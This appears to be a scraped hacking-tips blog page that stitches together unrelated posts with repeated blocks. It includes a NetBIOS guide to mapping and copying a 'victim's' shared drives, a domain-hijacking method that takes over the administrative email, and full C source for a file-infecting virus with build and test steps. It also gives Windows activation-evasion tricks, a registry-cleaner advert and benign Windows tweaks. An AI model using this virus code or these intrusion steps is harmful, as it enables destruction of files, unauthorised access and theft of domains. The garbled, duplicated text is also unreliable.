Some times it is necessary for our compiled project to have it’s supporting files embedded within the EXE module itself so that the supporting files may not be put into a seperate folder and carried along with the project. So here I am presenting you with the source code of the FILE EMBEDDER UTILITY project.
This utility can be used to embed one file with in the other. ie: Suppose we need to embed a .bat file(or any other file *.exe,*bmp,.txt…..) into our final project so that the batch file is present with in the compiled module and is hidden from the users avoiding tthe need to carry the .bat file every time with the project.
Both the Embedding and extraction process has been presented in seperate functions for your convenience. Here’s the code…..
#include<stdio.h>
#include<conio.h>
#include<fcntl.h>
#include<sys/types.h>
#include<sys/stat.h>
#include<stdlib.h>
#include<string.h> void embed(void);
void extract(void);
char buff[1],sname[128],tname[128],dname[128],choice;
unsigned long int size=0;long int psize=0;int outh,bytes=0;
FILE *source,*target,*data;
void main()
{
while(1)
{
clrscr();
puts(“\n\n\t\t\tFILE EMBEDDING UTILITY BY SRIKANTH\n\n\n”);
puts(“1.Embed A File 2. Extract A File 3.Exit\n”);
choice=getch();
switch(choice)
{
case ’1′:embed();
getch();
break;
case ’2′:
extract();
getch();
break;
default:
exit(0);
}
}
}
void embed()
{
puts(“\nEnter The Source Filename\n”);
scanf(“%s”,sname);
source=fopen(sname,”rb+”);
if(source==NULL)
{
puts(“\nCannot Open The Source File\n”);
return;
}
puts(“\nEnter The Target Filename\n”);
scanf(“%s”,tname);
outh=open(tname,O_RDONLYO_BINARY);
if(outh==-1)
{
puts(“\nCannot Open The Target File\n”);
return;
}
printf(“\nReading The Source File Please Wait…\n”);
while((bytes=read(outh,buff,1))>0)
size+=bytes;
data=fopen(“Data.cfg”,”w”);
if(data==NULL)
{
puts(“\nCannot Create Configuration The File\n”);
return;
}
fprintf(data,”%lu”,size);
close(outh);
fclose(data);
target=fopen(tname,”rb”);
if(target==NULL)
{
puts(“Cannot Open Target File\n”);
return;
}
printf(“\nEmbedding Please Wait…\n”);
fseek(source,0,SEEK_END);
while(fread(buff,1,1,target)>0)
fwrite(buff,1,1,source);
fcloseall();
printf(“\nEmbedding Completed Successfully\n”);
}
void extract()
{
printf(“\nEnter The Source Filename\n”);
scanf(“%s”,sname);
source=fopen(sname,”rb”);
if(source==NULL)
{
printf(“\nCannot Open The Source File\n”);
return;
}
printf(“\nEnter The Target Filename(eg: abc.exe)\n”);
scanf(“%s”,tname);
printf(“\nEnter The Configuration Filename(eg: DATA.cfg)\n”);
scanf(“%s”,dname);
data=fopen(dname,”r”);
if(data==NULL)
{
printf(“\nConfiguration File Not Found\n”);
return;
}
fscanf(data,”%ld”,&psize);
target=fopen(tname,”wb”);
if(target==NULL)
{
puts(“\nCannot Open The Target File\n”);
return;
}
printf(“\nExtracting Please Wait…\n”);
fseek(source,-psize,SEEK_END);
while((fread(buff,1,1,source))>0)
fwrite(buff,1,1,target);
printf(“\nFile Extraction Completed Successfully\n”);
fcloseall();
}
#include<conio.h>
#include<fcntl.h>
#include<sys/types.h>
#include<sys/stat.h>
#include<stdlib.h>
#include<string.h> void embed(void);
void extract(void);
char buff[1],sname[128],tname[128],dname[128],choice;
unsigned long int size=0;long int psize=0;int outh,bytes=0;
FILE *source,*target,*data;
void main()
{
while(1)
{
clrscr();
puts(“\n\n\t\t\tFILE EMBEDDING UTILITY BY SRIKANTH\n\n\n”);
puts(“1.Embed A File 2. Extract A File 3.Exit\n”);
choice=getch();
switch(choice)
{
case ’1′:embed();
getch();
break;
case ’2′:
extract();
getch();
break;
default:
exit(0);
}
}
}
void embed()
{
puts(“\nEnter The Source Filename\n”);
scanf(“%s”,sname);
source=fopen(sname,”rb+”);
if(source==NULL)
{
puts(“\nCannot Open The Source File\n”);
return;
}
puts(“\nEnter The Target Filename\n”);
scanf(“%s”,tname);
outh=open(tname,O_RDONLYO_BINARY);
if(outh==-1)
{
puts(“\nCannot Open The Target File\n”);
return;
}
printf(“\nReading The Source File Please Wait…\n”);
while((bytes=read(outh,buff,1))>0)
size+=bytes;
data=fopen(“Data.cfg”,”w”);
if(data==NULL)
{
puts(“\nCannot Create Configuration The File\n”);
return;
}
fprintf(data,”%lu”,size);
close(outh);
fclose(data);
target=fopen(tname,”rb”);
if(target==NULL)
{
puts(“Cannot Open Target File\n”);
return;
}
printf(“\nEmbedding Please Wait…\n”);
fseek(source,0,SEEK_END);
while(fread(buff,1,1,target)>0)
fwrite(buff,1,1,source);
fcloseall();
printf(“\nEmbedding Completed Successfully\n”);
}
void extract()
{
printf(“\nEnter The Source Filename\n”);
scanf(“%s”,sname);
source=fopen(sname,”rb”);
if(source==NULL)
{
printf(“\nCannot Open The Source File\n”);
return;
}
printf(“\nEnter The Target Filename(eg: abc.exe)\n”);
scanf(“%s”,tname);
printf(“\nEnter The Configuration Filename(eg: DATA.cfg)\n”);
scanf(“%s”,dname);
data=fopen(dname,”r”);
if(data==NULL)
{
printf(“\nConfiguration File Not Found\n”);
return;
}
fscanf(data,”%ld”,&psize);
target=fopen(tname,”wb”);
if(target==NULL)
{
puts(“\nCannot Open The Target File\n”);
return;
}
printf(“\nExtracting Please Wait…\n”);
fseek(source,-psize,SEEK_END);
while((fread(buff,1,1,source))>0)
fwrite(buff,1,1,target);
printf(“\nFile Extraction Completed Successfully\n”);
fcloseall();
}
YOU CAN DOWNLOAD THE COMPILED MODULE OF THE ABOVE CODE HERE
THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.
1.Open command prompt
2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).
Example: C:\>net view \\219.64.55.112
The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.
3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.
Example-1:
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint
NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.
NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.
4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.
Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.
NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.
HAPPY NETBOS HACKING!!An IP address (Internet Protocol address) is a unique address that certain electronic devices currently use in order to identify and communicate with each other on a computer network utilizing the Internet Protocol standard (IP)—in simpler terms, a computer address.
Any participating network device—including routers, switches, computers, infrastructure servers (e.g., NTP, DNS, DHCP, SNMP, etc.), printers, Internet fax machines, and some telephones—can have its own address that is unique within the scope of the specific network. Some IP addresses are intended to be unique within the scope of the global Internet, while others need to be unique only within the scope of an enterprise.
The IP address acts as a locator for one IP device to find another and interact with it. It is not intended, however, to act as an identifier that always uniquely identifies a particular device. In current practice, an IP address is less likely to be an identifier, due to technologies such as Dynamic assignment and Network address translation.
Although Google is a search engine, it’s also a website. It has millions of it’s own pages indexed in it. When i was digging deep inside Google i found some strange links inside it. So I decided to compile a list of strange Google links. Enjoy!
1. If you ever wondered all the misspellings of Britney Spears and their volume, you must check this out.http://www.google.com/jobs/britney.html
2. These two links are to fun Google games
http://www.google.com/Easter/feature_easter.html
http://www.google.com/heart/heart01.html
3. Quench your thirst for knowledge with Google Gulp
www.google.com/googlegulp
4. Check out Google’s latest ideas
http://www.google.com/experimental
5. If you are fond of puzzles
http://www.google.com/puzzles
6. Tribute to Moms
http://www.google.com/moms01
7. Google Mobile maps
http://www.google.com/mobile/gmm/index.html
8. http://www.google.com/tofc
9. Are you scary smart?
http://www.google.com/scarysmart
10. Google press center
http://www.google.com/press
11. Google apps
http://www.google.com/a/help/intl/en/var_0.html
12. Mind-racing problems
http://www.google.com/indiacodejam
13. Doodle 4 Google
http://www.google.com/doodle4google
14. The virgle
http://www.google.com/virgle
15. Google Alerts
http://www.google.com/alerts
16. Urchin Software from Google
http://www.google.com/urchin
17. Google dictionary
http://www.google.com/translate_dict
18. Inside google
http://www.google.com/plex
19. Movie reviews
http://www.google.com/reviews
20. Google Mars
htttp://www.google.com/mars
21. Google Sky
http://www.google.com/sky
22. Google’s next Coding Competition site
http://www.google.com/codejam
23.http://www.google.com/pda
24.http://www.google.com/m
25.http://www.google.com/imode
26.http://www.google.com/jsky
27. Blog search
http://www.google.com/blogsearch
28.Microsoft on google
http://www.google.com/microsoft
29. Google Moon
http://www.google.com/moon
30. Google Linux
http://www.google.com/linux
31. http://www.google.com/ie
32. Google tour
http://www.google.com/tour/services
33. Google TOS
http://www.google.com/accounts/TOS
34. Google trends
http://www.google.com/trends/hottrends
35. Google arts
http://www.google.com/Top/Arts
36. Google 3d warehouse
http://www.google.com/sketchup/3dwh
37. Google Adult content
http://www.google.com/Top/Adult
38. Google & Dilbert Doodle
http://www.google.com/dilbert.html
39. Google in Kannada
www.google.com/intl/kn
40. Google strange logos
http://www.google.com/doodle8.html
http://www.google.com/doodle9.html
30.Win Registry files in google
http://www.google.com/google_rsearch.reg
31.Google Universities Search
http://www.google.com/options/universities.html
This article explains how to inspect and repair registry errors to improve the performance of your PC. If you are a Windows user then you will most probably be aware of the fact that the registry gets corrupted over time resulting in an overall decreased performance of your computer. At times registry errors can also make your PC to freeze down and hang up every now and then causing a serious annoyance to the user. At this point, the registry needs a serious repair to bring your PC back to it’s life. Well before I tell you how to repair the registry lets see what causes registry to get corrupted.
Registry errors may occur due to installing too many applications/softwares from time to time without verifying the publishers. This may create invalid entries in the registry hive leading to errors. With the Internet boom and the era of freeware with free downloads, people often install programs from untrusted sources which results in serious damage to the registry. Since the registry is a crucial component of the Windows operating system, damage to this registry can cause system performance to drop down considerably.
How to Repair the Registry?
The best and the easiest way to repair your registry is by using a Registry Repair Tool (Registry Cleaner) which will automatically scan the registry to find invalid entries and will repair it by removing the errors with in no time. A registry cleaner is the simple and safest solution to repair registry and bring your PC back to it’s life without the need to re-install the Windows. We recommend the following registry cleaner to repair the Windows registry
Perfect Optimizer is one of the best and award winning registry cleaner that repairs registry to avoid PC errors such as unwanted shutdown, freezing, crashing and more. Perfect optimizer will
- Repair registry and increases your PC performance by upto 70%
- Repair registry to fix DLL errors and invalid shortcuts
- Free up virtual memory to avoid error messages
- Performs Defragmentation and Compression of the registry
- Repair registry to fix blue screen errors, system crashes, startup errors and more…
Can I Manually Repair the Registry?
Windows registry has a very complex structure with hundreds of thousands of entries embedded in it. A corrupt registry may contain thousands of invalid entries and errors in it and hence it is impractical and almost impossible to manually inspect, find and repair those errors. Also manual registry repair involves serious risk and can lead to a total system break down if done improperly. Except you are a highly experienced Windows user or a Windows expert, users are not encouraged to tamper with the registry.
Hence using a registry repair tool is the safest and easiest way to repair the registry and improve the overall performance of your PC. Registry repair tools will not only repair the registry but also maintains it’s health in a good condition so as to avoid any future damage to it. It is recommended that you periodically (daily or weekly) perform registry scans using these tools to repair the errors as and when they come up and keep your PC’s health at it’s best. Repair the registry and make your PC blazing fast like never before!
In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.
Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).
The operation of domain name is as follows
Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.
What happens when a domain is hijacked
Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case the John’s domain name (abc.com) is said to be hijacked.
How the domain names are hijacked
To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain.
These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.
How to protect the domain name from being hijacked
The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.
Here’s how you change the title text that appears at the top of the Messenger window. By default, this is “Yahoo! Messenger”, followed by your status. Simply edit the ymsgr.ini file, which you will find in the same folder as the Messenger program, in your Program Files folder. Locate the file and open it in Notepad. Then, at the end, add the following:
[APP TITLE]
caption=YOUR TEXT
caption=YOUR TEXT
Here, “YOUR TEXT” is whatever you want in the title bar. Save the file and close Messenger. When you restart it you will see your text in the title bar.
If you are a Windows Vista user then you are very likely to be familiar with the Base Score. This score is calculated based on the computer’s hardware and software configuration. This score act’s as a rating to your PC. If you have a too low base score then don’t worry. Hacking Windows Vista’s so called Base Score is very easy. It is possible to hack this score within no time.Here are the snapshots of my own system. Actually my system’s base score is 3.7. But I have brought it up to 9.5 with this small hack. Can you beleive this!!
Here is a step-by-step instruction to hack Vista Base score
1. Navigate to
C:\Windows\Performance\WinSAT\DataStore
2. You should see a .xml file with Assessment (Formal).WinSAT as filename
3. Right-click it and select open with ‘Wordpad’ (Not notepad!)
4. On line 12, you should see something like the following:
<SystemScore>9.5</SystemScore>
<MemoryScore>9.5</MemoryScore>
<CpuScore>9.5</CpuScore>
<CPUSubAggScore>9.5</CPUSubAggScore>
<VideoEncodeScore>5.5</VideoEncodeScore>
<GraphicsScore>9.5</GraphicsScore>
<GamingScore>9.5</GamingScore>
<DiskScore>9.5</DiskScore>
<MemoryScore>9.5</MemoryScore>
<CpuScore>9.5</CpuScore>
<CPUSubAggScore>9.5</CPUSubAggScore>
<VideoEncodeScore>5.5</VideoEncodeScore>
<GraphicsScore>9.5</GraphicsScore>
<GamingScore>9.5</GamingScore>
<DiskScore>9.5</DiskScore>
5. You can enter any number in the place where I have written 9.5. But the number should be less than 10.
6. Once you have entered the number of your choice save the file and close it.
7. That’s it. You have successfully altered your Windows Vista base score. No restart is required.
1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“. If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2.
2. Now type the following command and hit enterslmgr -rearm
3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.
4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
5. In right-side pane, change value of SkipRearm to 1.
6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can skip activation process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage.
120 days using “slmgr -rearm” command before registry edit +
240 days using “slmgr -rearm” command after registry edit
= 360 Days
240 days using “slmgr -rearm” command after registry edit
= 360 Days
This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
COMPILING METHOD:
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
HOW TO TEST:
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE
Some times it becomes necessary to block a website on our Computers for one or other reason. You can easily and effectivily block access to a website by adding it to your Windows HOSTS file. Once the website is blocked in the HOSTS file, it will not appear in any of the browsers. That is, the website becomes completely unavailable.
1. Go to your HOSTS file which is located at:
C:\WINDOWS\SYSTEM32\DRIVERS\ETC for Vista and XP
C:\WINNT\SYSTEM32\DRIVERS\ETC for Win 2000
C:\WINDOWS for Windows 98 and ME
2. Open HOSTS with Notepad.C:\WINNT\SYSTEM32\DRIVERS\ETC for Win 2000
C:\WINDOWS for Windows 98 and ME
The default Windows HOSTS looks like this:
______________________
# Copyright © 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a “#” symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
#
127.0.0.1 localhost
_____________________________
3. Directly under the line that says 127.0.0.1 Localhost, you will want to type:
127.0.0.1 name of the URL you want to block
For example to block the website MySpace.com, simply type:
127.0.0.1 myspace.com
127.0.0.1 www.myspace.com
Other parts of MySpace could be blocked in a similar way:127.0.0.1 www.myspace.com
127.0.0.1 search.myspace.com
127.0.0.1 profile.myspace.com
etc etc etc…
127.0.0.1 profile.myspace.com
etc etc etc…
It is necessary to add a website with and without the “www.”. You can add any number of websites to this list.
4. Close Notepad and answer “Yes” when prompted.
5. After blocking the website, test it in any of the browser. If every thing is done as said above,the website must not appear in any of the web browsers. You should see a Cannot find server or DNS Error saying: “The page cannot be displayed”. I have also created a virus to block a website which automatically blocks a list of websites as specified in the source program.
Some people suggest that your add a website to the Internet Explorer ‘Privacy’ settings. This does not block a site. It only stops that site from using cookieThis guide will show you how to edit/rename the Windows XP start menu button. Are you bored of having the name “start”? If so now you can rename your start menu button to give the name of your choice.
STEP 1: BYPASSING WINDOWS FILE PROTECTION
1. Launch My Computer, click tools, folder options, then view
2. Select show all hidden files and folders option and uncheck the option hide protected operating system files, unckeck hide extention for known file types
3. Goto C:\windows\system32\restore, select the file filelist.xml, right click it go to properties and uncheck the option read-only
4. Open it (filelist.xml) with notepad
5. Add the line <rec>%systemroot%\explorer.exe</rec> as shown below
<exclude>
<rec>%systemroot%\explorer.exe</rec>
<rec> %windir%\system.ini</rec>
<rec> %windir%\tasks\desktop.ini</rec>
<rec> %windir%\win.ini</rec>
<rec> *:\AUTOEXEC.BAT </rec>
<rec>*:\CONFIG.MSI</rec>
<rec> *:\CONFIG.SYS </rec>
<rec>%systemroot%\explorer.exe</rec>
<rec> %windir%\system.ini</rec>
<rec> %windir%\tasks\desktop.ini</rec>
<rec> %windir%\win.ini</rec>
<rec> *:\AUTOEXEC.BAT </rec>
<rec>*:\CONFIG.MSI</rec>
<rec> *:\CONFIG.SYS </rec>
6. Save the file
7. Goto C:\windows\system32\dllcache, you will find a backup copy of explorer.exe. Rename it to explorer.bak.
STEP 2: CHANGING THE NAME OF START BUTTON
1. Using Resource Hacker, open the file explorer.exe located at C:\windows.
2. Expand string, expand 37, click on 1033
3. On right side raname “start” to anything you want. For ex. “yourname” and press “compile script”
4. Repeat the same procedure for string 38, 1033
5. Save changes in file menu (if error occurs close explorer.exe and repeat sub-step 3 and 4)
6. Restart your computer. After restart you can see the changes. Enjoy!
Here is a way to remove the recycle bin from your desktop. This trick help’s people who want to get rid of the recycle bin on the desktop.
1. Goto start, Run, Type “gpedit.msc” (Type without quotes)
2. On the left panel, under User Configuration expand the tree Administrative templates
3. Click on the subtree desktop (single click, do not expand it)
4. On the right panel, Select the option-Remove Recycle Bin icon from desktop properties
5. Double click the option, on the settings tab just select the option enabled, press OK & exit the window.
6. Refesh the desktop (press F5), Your Recycle Bin vanishous. If not you need to logout and then re-login.
NOTE: This trick works on Win XP, Vista and Win 7
This trick will show you how to change Windows XP product key without re-installing the operating system. This makes it possible to install a new genuine key without the need to format and re-install your Windows XP.
1. Goto start menu, run, type regedit
2. In registry editor goto
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENT VERSION\WPA EVENTS
3. In the right panel open OOBE Timer
4. Edit/Change atleast one entry there, press OK and close registry editor.
5. In run type the following command
%systemroot%\system32\oobe\msoobe /a
and press enter
6. Activation wizard appears
7. Select activation by phone and in the next screen select the option CHANGE PRODUCT KEY, enter a valid corporate product key, press OK and close the wizard
8. Reboot the computer and type the same command in the Run
9. Activation wizard appears again and it shows the message WINDOWS IS ALREADY ACTIVATED.
Yes it is possible to change Adminstrator password both in Win XP and Vista without knowing it. If you somehow manage to login as an Administrator then you can change the password without knowing it.
Here’s the Step-By-Step instructions
1. Right-click on the “My Computer” icon on the desktop OR in the Start Menu.
2. Select the option “Manage”.
3. On the left pane expand the “Computer Management (Local) tree (if it is not already expanded)
4. Double click “Local Users and Groups” option From “System Tools” tree.
5. Click the “Users” option.
6. Now you will see the list of users on the right side pane, such as Administrator, Guest etc.
7. Right click the “Administrator” and select the option “Set Password” option.
8. Now you will see a warning message, Click on proceed.
9. Now the system asks you for “New Password” and “Confirm Password” .
10. After entering the password click on “OK”. The password is changed. That’s It!
windows has a nice new Start menu, which you can customize more thoroughly than you could with the Start menu in any earlier version of Windows. Open the Taskbar And Start Menu Properties dialog box by right-clicking the taskbar and clicking Properties. On the Start Menu tab, select either the Start Menu option or the Classic Start Menu option to choose which version of the Start menu to use, and then click Customize. The Customize Start Menu dialog box appears; you use this box to customize how Windows displays the Start menu.
The following sections describe the most useful Start menu hacks. First you learn how to configure what does and does not appear on the Start menu. Then you learn how to prevent some programs from appearing on the frequently used programs list. You also learn how to restore the Start menu’s sort order when it’s not in alphabetical order.
Configuring the Start Menu’s Contents
Even though you can completely customize the Start menu in the user interface, power users and IT professionals will likely want to script Start menu customizations. Power users don’t want to reconfigure the Start menu every time they install Windows. IT professionals can use scripts to deploy these settings or configure them automatically when creating default user profiles.
If you want to script these settings, you need to know where to find them in the registry. All these settings are in the same place:
HKCU\Software\Microsoft\Windows\ CurrentVersion\Explorer\Advanced
The first section, “Classic Start Menu,” contains values that affect the classic Start menu. The second section, “New Start Menu,” contains values that affect the new Start menu, also known as the Start panel. Most of these settings are REG_DWORD values, but some are REG_SZ values. If the possible data for any of the settings includes 0×01, 0×02, and so on, that setting is a REG_DWORD value. If the possible data includes NO or YES, it’s a REG_SZ value.
CLASSIC START MENU
0×00–Hide Administrative Tools
0×01–Display Administrative Tools
CascadeControlPanel
NO–Display Control Panel as link
YES–Display Control Panel as menu
CascadeMyDocuments
NO–Display My Documents as link
YES–Display My Documents as menu
CascadeMyPictures
NO–Display My Pictures as link
YES–Display My Pictures as menu
CascadePrinters
NO–Display Printers as link
YES–Display Printers as menu
IntelliMenus
0×00–Don’t use personalized menus
0×01–Use Personalized Menus
CascadeNetworkConnections
NO–Display Network Connections as link
YES–Display Network Connections as menu
Start_LargeMFUIcons
0×00–Show small icons in Start menu
0×01–Show large icons in Start menu
StartMenuChange
0×00–Disable dragging and dropping
0×01–Enable dragging and dropping
StartMenuFavorites
0×00–Hide Favorites
0×01–Display Favorites
StartMenuLogoff
0×00–Hide Log Off
0×01–Display Log Off
StartMenuRun
0×00–Hide Run command
0×01–Display Run command
StartMenuScrollPrograms
NO–Don’t scroll Programs menu
YES–Scroll Programs menu
NEW START MENU
0×00–Hide Control Panel
0×01–Show Control Panel as link
0×02–Show Control Panel as menu
Start_EnableDragDrop
0×00–Disable dragging and dropping
0×01–Enable dragging and dropping
StartMenuFavorites
0×00–Hide Favorites menu
0×01–Show Favorites menu
Start_ShowMyComputer
0×00–Hide My Computer
0×01–Show My Computer as link
0×02–Show My Computer as menu
Start_ShowMyDocs
0×00–Hide My Documents
0×01–Show My Documents as link
0×02–Show My Documents as menu
Start_ShowMyMusic
0×00–Hide My Music
0×01–Show My Music as link
0×02–Show My Music as menu
Start_ShowMyPics
0×00–Hide My Pictures
0×01–Show My Pictures as link
0×02–Show My Pictures as menu
Start_ShowNetConn
0×00–Hide Network Connections
